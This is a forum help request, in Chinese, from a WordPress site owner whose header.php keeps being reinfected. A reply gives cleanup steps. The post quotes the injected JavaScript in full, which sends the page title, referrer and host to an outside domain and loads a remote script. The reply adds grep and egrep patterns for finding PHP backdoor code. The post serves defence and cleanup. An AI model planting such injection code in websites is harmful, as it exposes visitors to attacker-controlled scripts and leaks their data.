向熟悉jquery恶意软件的人寻求帮助。我在我的WordPress网站上感染了一个注入的脚本,每次我在24小时后从我的Header.php中删除注入的代码时,它都会将其修改后的版本重新注入到我的托管服务器上的Header.php文件中。
把我逼疯了。网站是www.icrsolutions.co.uk,脚本如下:
<script>
var a = '';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://uniluxvfc.com/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') {
document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
}
</script>
以下内容也适用于Joomla:
- 更改所有密码
- 将您的安装和任何附加组件/模块更新到最新版本
- 识别并清除所有包含恶意脚本的文件。在Linux上,可以使用以下方法查找文件:
grep -r jquery.min.php <webserver directory> | awk -F': '{ print $1 }' - 清除所有包含任何"有效负载"的文件。在Linux上,您可以使用以下内容来识别这些文件会有误报,因此当有疑问时,请对照CMS的新副本检查文件。
egrep -Rl ''$GLOBALS.*''x|GLO.*SERVER|'$_COOKIE|,"508"|function.*for.*strlen.*isset|isset.*eval' <webserver directory> 2>/dev/null
更改每个密码,然后删除脚本/恶意代码。
然后,更新每个插件,以及wordpress本身。